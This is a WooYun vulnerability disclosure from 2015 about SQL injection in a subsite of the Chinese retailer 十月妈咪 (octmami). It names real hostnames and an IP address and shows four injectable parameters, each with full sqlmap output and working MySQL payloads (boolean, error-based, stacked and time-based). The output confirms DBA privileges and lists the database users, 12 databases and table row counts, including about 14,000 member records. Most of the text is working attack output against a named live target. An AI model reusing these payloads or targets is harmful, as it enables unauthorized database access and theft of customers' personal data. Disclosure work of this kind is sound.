当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152732

漏洞标题:十月妈咪某子站存在多处SQL注入(DBA权限+一万多用户+12个库)

相关厂商:十月妈咪

漏洞作者: 路人甲

提交时间:2015-11-11 00:27

修复时间:2015-12-26 00:28

公开时间:2015-12-26 00:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

继续对子站进行测试!~~~

详细说明:

首先,以下

http://27.115.100.242/wap/detail/index?goods=2926
http://st.octmami.com/wap/detail/index?goods=2926
http://manage.st.octmami.com/wap/detail/index?goods=2926
http://svn.octmami.com/wap/detail/index?goods=2926
http://test2.st.octmami.com/wap/detail/index?goods=2926
http://test.st.octmami.com/wap/detail/index?goods=2926
http://t.st.octmami.com/wap/detail/index?goods=2926
http://dev.st.octmami.com/wap/detail/index?goods=2926
http://1.st.octmami.com/wap/detail/index?goods=2926
http://3.st.octmami.com/wap/detail/index?goods=2926
http://s2.st.octmami.com/wap/detail/index?goods=2926


都一样的
所以只拿一个来进行测试即可!~~~
注入点一:
http://st.octmami.com/wap/detail/index?goods=2926

[*] starting at 03:42:47
[03:42:47] [INFO] testing connection to the target URL
[03:42:48] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:42:48] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[03:42:49] [INFO] target URL is stable
[03:42:49] [INFO] testing if GET parameter 'goods' is dynamic
[03:42:49] [INFO] heuristics detected web page charset 'utf-8'
[03:42:49] [INFO] confirming that GET parameter 'goods' is dynamic
[03:42:49] [INFO] GET parameter 'goods' is dynamic
[03:42:50] [INFO] heuristic (basic) test shows that GET parameter 'goods' might
be injectable (possible DBMS: 'MySQL')
[03:42:50] [INFO] testing for SQL injection on GET parameter 'goods'
[03:42:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:42:50] [WARNING] reflective value(s) found and filtering out
[03:42:51] [INFO] GET parameter 'goods' seems to be 'AND boolean-based blind - W
HERE or HAVING clause' injectable
[03:42:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[03:42:52] [INFO] GET parameter 'goods' is 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause' injectable
[03:42:52] [INFO] testing 'MySQL inline queries'
[03:42:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:42:52] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[03:43:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 stacked quer
ies' injectable
[03:43:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[03:44:14] [INFO] GET parameter 'goods' seems to be 'MySQL > 5.0.11 AND time-bas
ed blind' injectable
[03:44:14] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:44:14] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:44:14] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[03:44:16] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[03:44:59] [INFO] testing 'Generic UNION query (27) - 1 to 20 columns'
GET parameter 'goods' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: GET
Parameter: goods
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods=2926 AND 5665=5665
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods=2926 AND (SELECT 4829 FROM(SELECT COUNT(*),CONCAT(0x717764627
1,(SELECT (CASE WHEN (4829=4829) THEN 1 ELSE 0 END)),0x7179756a71,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: goods=2926; SELECT SLEEP(5)--
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: goods=2926 AND SLEEP(5)
---
[03:49:40] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[03:49:40] [INFO] fetching current user
[03:49:40] [INFO] retrieved: chen@%
current user: 'chen@%'
[03:49:40] [INFO] fetching current database
[03:49:40] [INFO] retrieved: ecstore
current database: 'ecstore'
[03:49:40] [INFO] testing if current user is DBA
[03:49:40] [INFO] fetching current user
current user is DBA: True
database management system users [9]:
[*] ''@'localhost'
[*] 'chen'@'%'
[*] 'ecstore'@'localhost'
[*] 'proftpd'@'%'
[*] 'proftpd'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[03:51:03] [INFO] fetching database names
[03:51:03] [INFO] the SQL query used returns 12 entries
[03:51:03] [INFO] starting 10 threads
[03:51:04] [INFO] retrieved: mysql
[03:51:04] [INFO] retrieved: performance_schema
[03:51:04] [INFO] retrieved: information_schema
[03:51:04] [INFO] retrieved: test
[03:51:04] [INFO] retrieved: ecstore_new
[03:51:04] [INFO] retrieved: purchase
[03:51:04] [INFO] retrieved: server
[03:51:04] [INFO] retrieved: octmami
[03:51:04] [INFO] retrieved: ecstore
[03:51:04] [INFO] retrieved: corp
[03:51:04] [INFO] retrieved: youxi
[03:51:04] [INFO] retrieved: zentao
available databases [12]:
[*] corp
[*] ecstore
[*] ecstore_new
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao
Database: ecstore_new
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot | 224072 |
| oct_coupon_list | 81028 |
| sdb_image_image | 71715 |
| sdb_b2c_comment_goods_point | 27465 |
| oct_cps_log | 19161 |
| sdb_b2c_order_log | 15183 |
| sdb_b2c_members | 14474 |
| sdb_image_image_attach | 13150 |
| sdb_b2c_member_comments | 12571 |
| sdb_b2c_order_items | 10272 |
| sdb_b2c_order_objects | 10244 |
| sdb_b2c_products | 7366 |
| oct_verification_code | 6576 |
| oct_member_point | 6538 |
| sdb_operatorlog_normallogs | 5897 |
| oct_member_wap_info | 5688 |
| oct_advertisement_items | 5528 |
| sdb_b2c_goods_keywords | 5377 |
| oct_b2c_goods_spec_index | 5284 |
| sdb_b2c_goods | 5139 |
| sdb_b2c_member_coupon | 4697 |
| oct_member_weixin_bind | 4680 |
| sdb_b2c_order_pmt | 4605 |
| sdb_b2c_orders | 4581 |
| sdb_b2c_delivery_items | 3793 |
| sdb_ectools_regions | 3266 |
| sdb_b2c_member_addrs | 3199 |
| sdb_b2c_order_delivery | 2497 |
| sdb_b2c_delivery | 2492 |
| oct_recommend_loaction | 2305 |
| oct_member_weixin_bind3 | 2173 |
| sdb_pam_members | 1920 |
| sdb_b2c_goods_spec_index | 1672 |
| sdb_b2c_goods_type_props_value | 1606 |
| sdb_base_kvstore | 1579 |
| sdb_pam_log_desktop | 1515 |
| sdb_b2c_cart_objects | 1320 |
| sdb_b2c_type_brand | 1231 |
| sdb_apiactionlog_apilog | 1222 |
| oct_prompt_limit | 947 |
| sdb_b2c_member_point | 839 |
| sdb_base_app_content | 784 |
| oct_search_words | 673 |
| sdb_b2c_member_goods | 607 |
| sdb_desktop_tag_rel | 607 |
| sdb_base_cache_expires | 606 |
| oct_banner_info | 577 |
| oct_banner_location | 577 |
| sdb_b2c_sell_logs | 569 |
| sdb_ectools_analysis_logs | 559 |
| sdb_dbeav_meta_value_text | 517 |
| sdb_b2c_spec_values | 454 |
| sdb_dbeav_meta_value_longtext | 452 |
| sdb_ectools_order_bills | 421 |
| sdb_desktop_recycle | 418 |
| sdb_ectools_payments | 380 |
| sdb_b2c_brand | 335 |
| oct_prize | 322 |
| sdb_aftersales_return_product | 317 |
| sdb_base_setting | 317 |
| oct_advertisement | 300 |
| sdb_b2c_goods_type_props | 295 |
| oct_order_pmt | 275 |
| sdb_desktop_menus | 258 |
| sdb_b2c_order_cancel_reason | 235 |
| sdb_site_widgets_instance | 203 |
| oct_cps_valuation | 200 |
| oct_turn_table | 200 |
| oct_coupon_order_item | 186 |
| oct_brand_special | 153 |
| oct_stores | 140 |
| oct_cps_put | 121 |
| sdb_site_widgets | 121 |
| sdb_system_queue_mysql | 110 |
| oct_feedback | 102 |
| oct_stores_image | 99 |
| oct_special_product | 98 |
| sdb_b2c_goods_cat | 93 |
| sdb_b2c_goods_rate | 93 |
| sdb_site_themes_file | 93 |
| sdb_order_task_log | 82 |
| sdb_operatorlog_register | 79 |
| sdb_b2c_goods_type | 76 |
| sdb_b2c_goods_type_spec | 73 |
| sdb_content_article_bodys | 72 |
| sdb_b2c_goods_lv_price | 68 |
| sdb_search_associate | 63 |
| oct_service_call | 58 |
| sdb_search_delta | 58 |
| sdb_site_themes_tmpl | 57 |
| oct_cps_put_type | 54 |
| baby_face_get_stars | 52 |
| oct_cps_case | 50 |
| sdb_base_apps | 49 |
| oct_coupon_cate | 45 |
| oct_coupon_rule | 45 |
| oct_prompt_flash | 43 |
| sdb_ectools_refunds | 41 |
| oct_banner_dimension | 40 |
| sdb_content_article_indexs | 40 |
| oct_coupon_grant | 37 |
| oct_recommend_comment_cat | 36 |
| sdb_starbuy_special_goods | 35 |
| sdb_b2c_goods_promotion_ref | 34 |
| sdb_b2c_sales_rule_order | 31 |
| sdb_desktop_tag | 31 |
| sdb_dbeav_meta_value_varchar | 30 |
| sdb_b2c_dlycorp | 27 |
| sdb_b2c_member_systmpl | 26 |
| sdb_b2c_goods_virtual_cat | 25 |
| sdb_site_modules | 25 |
| sdb_couponlog_order_coupon_ref | 24 |
| sdb_couponlog_order_coupon_user | 24 |
| sdb_gift_ref | 24 |
| sdb_desktop_hasrole | 22 |
| sdb_b2c_coupons | 20 |
| sdb_b2c_specification | 20 |
| sdb_dbeav_meta_register | 18 |
| oct_recommend_dimension | 17 |
| sdb_desktop_users | 17 |
| sdb_wap_modules | 16 |
| sdb_dbeav_meta_value_int | 14 |
| sdb_pam_account | 14 |
| sdb_starbuy_special | 14 |
| oct_recommend_comment_define | 12 |
| oct_sm_task_items | 12 |
| sdb_base_crontab | 12 |
| sdb_wap_widgets | 12 |
| oct_recommend_comment_info | 10 |
| sdb_b2c_member_advance | 9 |
| sdb_content_article_nodes | 9 |
| sdb_site_menus | 9 |
| oct_search_hot | 8 |
| sdb_b2c_member_lv | 8 |
| oct_special_info | 7 |
| sdb_importexport_task | 7 |
| sdb_site_seo | 7 |
| oct_sm_queues | 6 |
| sdb_b2c_reship_items | 6 |
| sdb_desktop_roles | 6 |
| oct_channel | 5 |
| oct_employees | 5 |
| oct_goods_seckill | 5 |
| oct_prompt_activity | 5 |
| oct_sm_users | 5 |
| sdb_wap_themes_file | 5 |
| sdb_wap_themes_tmpl | 5 |
| sdb_wap_widgets_instance | 5 |
| oct_admin_group | 4 |
| oct_sm_tasks | 4 |
| sdb_b2c_dlytype | 4 |
| sdb_b2c_reship | 4 |
| oct_location | 3 |
| oct_sm_models | 3 |
| sdb_b2c_comment_goods_type | 3 |
| sdb_base_network | 3 |
| sdb_ectools_analysis | 3 |
| sdb_site_themes | 3 |
| sdb_starbuy_promotions_type | 3 |
| oct_agent | 2 |
| oct_business_district | 2 |
| sdb_b2c_orders_recommend | 2 |
| sdb_gift_cat | 2 |
| sdb_site_route_statics | 2 |
| oct_draw_list | 1 |
| oct_goods_ads | 1 |
| oct_sm_tags | 1 |
| sdb_b2c_goods_store_prompt | 1 |
| sdb_desktop_filter | 1 |
| sdb_ectools_currency | 1 |
| sdb_site_explorers | 1 |
| sdb_site_link | 1 |
| sdb_starbuy_cancelorder | 1 |
| sdb_starbuy_count_member_buy | 1 |
| sdb_wap_themes | 1 |
+---------------------------------+---------+


新的库?貌似用户也挺多了,不会是测试得把???

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


注入点二:
http://st.octmami.com/wap/detail/specproduct (POST)
goods_id=2858&spec=24-306 28-346

[09:28:51] [INFO] testing connection to the target URL
[09:28:51] [INFO] heuristics detected web page charset 'ascii'
[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:28:52] [INFO] target URL is stable
[09:28:52] [INFO] testing if POST parameter 'goods_id' is dynamic
[09:28:52] [INFO] confirming that POST parameter 'goods_id' is dynamic
[09:28:52] [WARNING] POST parameter 'goods_id' does not appear dynamic
[09:28:53] [INFO] heuristic (basic) test shows that POST parameter 'goods_id' mi
ght be injectable (possible DBMS: 'MySQL')
[09:28:53] [INFO] testing for SQL injection on POST parameter 'goods_id'
[09:28:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:53] [WARNING] reflective value(s) found and filtering out
[09:28:53] [INFO] POST parameter 'goods_id' seems to be 'AND boolean-based blind
- WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:28:53] [INFO] POST parameter 'goods_id' is 'MySQL >= 5.0 AND error-based - W
HERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'MySQL inline queries'
[09:28:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:28:54] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:29:04] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 stacked
queries' injectable
[09:29:04] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:05] [INFO] POST parameter 'goods_id' seems to be 'MySQL > 5.0.11 AND time
-based blind' injectable
[09:30:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:30:05] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:30:05] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:30:06] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:30:09] [INFO] testing 'Generic UNION query (87) - 1 to 20 columns'
POST parameter 'goods_id' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
[09:30:14] [INFO] testing if POST parameter 'spec' is dynamic
[09:30:14] [INFO] confirming that POST parameter 'spec' is dynamic
[09:30:14] [INFO] POST parameter 'spec' is dynamic
[09:30:14] [WARNING] heuristic (basic) test shows that POST parameter 'spec' mig
ht not be injectable
[09:30:14] [INFO] testing for SQL injection on POST parameter 'spec'
[09:30:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:30:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:30:17] [INFO] testing 'MySQL inline queries'
[09:30:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:30:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:30:19] [INFO] testing 'MySQL UNION query (87) - 1 to 10 columns'
[09:30:22] [INFO] testing 'Generic UNION query (87) - 1 to 10 columns'
[09:30:25] [WARNING] POST parameter 'spec' is not injectable
sqlmap identified the following injection points with a total of 116 HTTP(s) req
uests:
---
Place: POST
Parameter: goods_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: goods_id=2858 AND 9858=9858&spec=24-306 28-346
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: goods_id=2858 AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x717979
7871,(SELECT (CASE WHEN (8940=8940) THEN 1 ELSE 0 END)),0x71616a7271,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&spec=24-306 28-346
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: goods_id=2858; SELECT SLEEP(5)-- &spec=24-306 28-346
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: goods_id=2858 AND SLEEP(5)&spec=24-306 28-346
---
[09:30:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:30:25] [INFO] fetching current user
[09:30:26] [INFO] retrieved: chen@%
current user: 'chen@%'
[09:30:26] [INFO] fetching current database
[09:30:26] [INFO] retrieved: ecstore
current database: 'ecstore'
[09:30:26] [INFO] testing if current user is DBA
[09:30:26] [INFO] fetching current user
current user is DBA: True


注入点三:
http://st.octmami.com/wap/detail/checkstore (POST)
product_id=5353&buy_number=2

[09:31:33] [INFO] testing connection to the target URL
[09:31:34] [INFO] heuristics detected web page charset 'ascii'
[09:31:34] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[09:31:35] [INFO] target URL is stable
[09:31:35] [INFO] testing if POST parameter 'product_id' is dynamic
[09:31:35] [INFO] confirming that POST parameter 'product_id' is dynamic
[09:31:35] [INFO] POST parameter 'product_id' is dynamic
[09:31:35] [INFO] heuristic (basic) test shows that POST parameter 'product_id'
might be injectable (possible DBMS: 'MySQL')
[09:31:35] [INFO] testing for SQL injection on POST parameter 'product_id'
[09:31:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:31:35] [WARNING] reflective value(s) found and filtering out
[09:31:36] [INFO] POST parameter 'product_id' seems to be 'AND boolean-based bli
nd - WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:31:36] [INFO] POST parameter 'product_id' is 'MySQL >= 5.0 AND error-based -
WHERE or HAVING clause' injectable
[09:31:36] [INFO] testing 'MySQL inline queries'
[09:31:36] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:31:36] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[09:31:47] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 stacke
d queries' injectable
[09:31:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:31:57] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 AND ti
me-based blind' injectable
[09:31:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:31:57] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[09:31:58] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[09:31:58] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[09:32:01] [INFO] testing 'Generic UNION query (49) - 1 to 20 columns'
POST parameter 'product_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
[09:32:04] [INFO] testing if POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] confirming that POST parameter 'buy_number' is dynamic
[09:32:04] [INFO] POST parameter 'buy_number' is dynamic
[09:32:05] [INFO] heuristic (basic) test shows that POST parameter 'buy_number'
might be injectable (possible DBMS: 'MySQL')
[09:32:05] [INFO] testing for SQL injection on POST parameter 'buy_number'
[09:32:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:32:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[09:32:08] [INFO] testing 'MySQL inline queries'
[09:32:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:32:09] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[09:32:10] [INFO] testing 'MySQL UNION query (49) - 1 to 10 columns'
[09:32:13] [INFO] testing 'Generic UNION query (49) - 1 to 10 columns'
[09:32:16] [WARNING] POST parameter 'buy_number' is not injectable
sqlmap identified the following injection points with a total of 123 HTTP(s) req
uests:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=5353 AND 5490=5490&buy_number=2
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=5353 AND (SELECT 5614 FROM(SELECT COUNT(*),CONCAT(0x7166
656171,(SELECT (CASE WHEN (5614=5614) THEN 1 ELSE 0 END)),0x7164777071,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&buy_number=2
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: product_id=5353; SELECT SLEEP(5)-- &buy_number=2
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=5353 AND SLEEP(5)&buy_number=2
---
[09:32:17] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL 5.0
[09:32:17] [INFO] fetching current user
[09:32:17] [INFO] retrieved: chen@%
current user: 'chen@%'
[09:32:17] [INFO] fetching current database
[09:32:17] [INFO] retrieved: ecstore
current database: 'ecstore'
[09:32:17] [INFO] testing if current user is DBA
[09:32:17] [INFO] fetching current user
current user is DBA: True


注入点四:
http://st.octmami.com/wap/cart/insert (POST)
product_id=5353&quantity=2&quantity_type=add

[09:40:12] [INFO] testing connection to the target URL
[09:40:12] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: product_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: product_id=5353 AND 4348=4348&quantity=2&quantity_type=add
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: product_id=5353 AND (SELECT 4743 FROM(SELECT COUNT(*),CONCAT(0x7174
747671,(SELECT (CASE WHEN (4743=4743) THEN 1 ELSE 0 END)),0x7170637671,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2&quanti
ty_type=add
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: product_id=5353; SELECT SLEEP(5)-- &quantity=2&quantity_type=add
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: product_id=5353 AND SLEEP(5)&quantity=2&quantity_type=add
---
[09:40:12] [INFO] testing MySQL
[09:40:12] [WARNING] reflective value(s) found and filtering out
[09:40:12] [INFO] confirming MySQL
[09:40:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.38
back-end DBMS: MySQL >= 5.0.0
[09:40:13] [INFO] fetching current user
[09:40:13] [INFO] resumed: chen@%
current user: 'chen@%'
[09:40:13] [INFO] fetching current database
[09:40:13] [INFO] resumed: ecstore
current database: 'ecstore'
[09:40:13] [INFO] testing if current user is DBA
[09:40:13] [INFO] fetching current user
current user is DBA: True

漏洞证明:

4.jpg


5.jpg


修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝